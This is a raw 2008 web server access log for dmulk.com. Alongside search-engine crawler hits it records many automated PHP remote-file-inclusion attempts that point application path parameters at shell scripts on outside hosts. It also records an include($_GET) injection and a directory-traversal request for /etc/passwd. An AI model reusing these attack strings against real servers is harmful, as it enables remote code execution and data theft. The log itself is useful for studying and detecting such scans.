200.48.204.130 - - [07/Apr/2008:12:07:30 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.199k.info/krix/sistem.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:42 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:43 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:44 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:44 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:46 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:07:47 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:08:10 -0700] "GET /logs/access_071214.log//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:08:10 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:08:11 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.8.122 - - [07/Apr/2008:12:08:42 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.31.92 - - [07/Apr/2008:12:08:44 -0700] "GET /blog/index.php/comments/feed/ HTTP/1.0" 304 1 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
212.111.204.40 - - [07/Apr/2008:12:09:05 -0700] "GET /logs/access_080223.log/index.php?body=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.111.204.40 - - [07/Apr/2008:12:09:06 -0700] "GET /logs/index.php?body=http://www.antares.net/borda2.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.191.68.75 - - [07/Apr/2008:12:09:25 -0700] "GET //errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.251 - - [07/Apr/2008:12:09:27 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.23.179 - - [07/Apr/2008:12:09:30 -0700] "GET /blog/xmlrpc.php HTTP/1.0" 200 43 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.16.162 - - [07/Apr/2008:12:09:47 -0700] "GET /blog/index.php/comments/ HTTP/1.0" 404 4990 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.19.62 - - [07/Apr/2008:12:09:47 -0700] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.198.89.199 - - [07/Apr/2008:12:10:19 -0700] "GET /logs/access_071215.log//skin/zero_vote/ask_password.php?dir=http://dt-support.com/hcl/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:10:26 -0700] "GET /logs/access_071201.log HTTP/1.0" 200 44753 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.106.179.153 - - [07/Apr/2008:12:10:32 -0700] "GET /init_basic.php?GALLERY_BASEDIR=http://odyrt.net/info/templates/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:10:50 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:10:51 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
74.6.22.185 - - [07/Apr/2008:12:12:24 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.6.9.101 - - [07/Apr/2008:12:12:27 -0700] "GET /blog/xmlrpc.php?rsd HTTP/1.0" 200 718 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:32 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:34 -0700] "GET /logs/access_080226.log//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:34 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:35 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:36 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
91.185.193.90 - - [07/Apr/2008:12:12:37 -0700] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://xdedzx.100webspace.net/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.24.44 - - [07/Apr/2008:12:13:31 -0700] "GET /blog/index.php/2008/04/03/hello-world/ HTTP/1.0" 200 7074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:13:40 -0700] "GET /logs/access_070902.log HTTP/1.0" 200 22717 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
65.55.209.207 - - [07/Apr/2008:12:13:59 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
65.55.209.207 - - [07/Apr/2008:12:14:00 -0700] "GET /presto/?S=A HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
69.147.112.168 - - [07/Apr/2008:12:14:31 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 859311 "-" "Yahoo Pipes 1.0" "www.dmulk.com"
70.47.36.29 - - [07/Apr/2008:12:15:14 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [07/Apr/2008:12:15:14 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.47.36.29 - - [07/Apr/2008:12:15:14 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.8.53 - - [07/Apr/2008:12:15:50 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:15:51 -0700] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.venezia2.it/coges.txt?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.805" "www.dmulk.com"
70.47.36.29 - - [07/Apr/2008:12:15:55 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://ezsm.ru/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.25.52 - - [07/Apr/2008:12:16:49 -0700] "GET /blog/index.php/2008/04/03/ HTTP/1.0" 200 6453 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
213.221.88.99 - - [07/Apr/2008:12:17:43 -0700] "GET /account.php?action=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
213.221.88.99 - - [07/Apr/2008:12:17:43 -0700] "GET /logs/account.php?action=http://www.vivexperiencia.pt/site/cache/.log/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
203.27.8.25 - - [07/Apr/2008:12:17:49 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.cpjtechniek.nl/on.txt?????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:17:55 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:17:55 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.61.30.100 - - [07/Apr/2008:12:17:55 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.174.24.65 - - [07/Apr/2008:12:17:56 -0700] "GET /%22/mole_2_1_0/viewsource.php?dirn=%22/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
212.174.24.65 - - [07/Apr/2008:12:17:56 -0700] "GET /logs/%22/mole_2_1_0/viewsource.php?dirn=%22/../../../../../../../../etc/passwd HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:18:13 -0700] "GET /logs/access_080215.log/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:18:13 -0700] "GET /include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.53.138.149 - - [07/Apr/2008:12:18:13 -0700] "GET /logs/include/functions_common.php?gl_root_path=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
212.227.98.178 - - [07/Apr/2008:12:18:18 -0700] "GET /logs/access_080118.log//init_basic.php?GALLERY_BASEDIR=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:12:18:39 -0700] "GET /index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 200 7371 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.22.128 - - [07/Apr/2008:12:18:39 -0700] "GET /logs/index.php?option=com_facileforms&Itemid=&mosConfig_absolute_path=http://wealdentalkingnews.net/templates/sistem.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.223.177 - - [07/Apr/2008:12:18:54 -0700] "GET /logs/access.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.142.223.177 - - [07/Apr/2008:12:18:55 -0700] "GET /logs/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:19:49 -0700] "GET /logs/access_080211.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:19:49 -0700] "GET //components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:19:49 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:20:18 -0700] "GET /logs/access_071214.log/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:20:18 -0700] "GET /admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:20:18 -0700] "GET /logs/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:20:18 -0700] "GET /logs/access_080123.log/admin.php?include_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.195.37.167 - - [07/Apr/2008:12:20:20 -0700] "GET /logs/access_071020.log HTTP/1.0" 200 15561 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.11.238.233 - - [07/Apr/2008:12:20:23 -0700] "GET /logs/access_071229.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://wepa.djbigrican.com/media/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:20:29 -0700] "GET /logs/access_080211.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:20:30 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:20:30 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
202.142.223.177 - - [07/Apr/2008:12:20:32 -0700] "GET /logs/access_080126.log/tellmatic/include/libchart-1.1/libchart.php?tm_includepath=http://sdsurha.com/pblog/content/06/08/echo2? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:20:36 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:20:36 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:12:21:29 -0700] "GET /logs/access_080122.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:12:21:29 -0700] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:12:21:30 -0700] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:21:32 -0700] "GET /logs/access_080130.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:21:32 -0700] "GET //agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:21:32 -0700] "GET /logs//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.89.27.217 - - [07/Apr/2008:12:21:32 -0700] "GET /logs/access.log//agendax/addevent.inc.php?agendax_path=http://h1.ripway.com/barsel/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:21:53 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.214.73.237 - - [07/Apr/2008:12:21:54 -0700] "GET /logs/access_080211.log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://h1.ripway.com/nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
189.38.50.24 - - [07/Apr/2008:12:22:18 -0700] "GET /logs/access_080122.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://sbc.sytu.edu.cn/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:22:47 -0700] "GET /logs/access_071212.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:22:47 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:22:48 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:23:05 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.21.219 - - [07/Apr/2008:12:23:10 -0700] "GET /blog/index.php/2008/04/03/hello-world/trackback/ HTTP/1.0" 200 7074 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
195.74.65.15 - - [07/Apr/2008:12:23:11 -0700] "GET /index.php?side=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 200 7371 "-" "libwww-perl/5.803" "www.dmulk.com"
87.101.95.197 - - [07/Apr/2008:12:23:12 -0700] "GET //errors.php?error=http://www.venezia2.it/coges.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:23:35 -0700] "GET /logs/access_080308.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:23:35 -0700] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:23:36 -0700] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:12:23:45 -0700] "GET /logs/access_080324.log//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.230.71.1 - - [07/Apr/2008:12:23:46 -0700] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://boxstr.com/files/1311840_mm1dt/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.28 - - [07/Apr/2008:12:23:53 -0700] "GET /logs/access_080324.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ciociariaturismo.it/images/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET /logs/access_071212.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:03 -0700] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.58.179.218 - - [07/Apr/2008:12:24:04 -0700] "GET /logs/access_071216.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:24:20 -0700] "GET /logs//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
207.210.91.50 - - [07/Apr/2008:12:24:21 -0700] "GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.hairbyerin.net/TotalCalendar_2.4/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.dmulk.com"
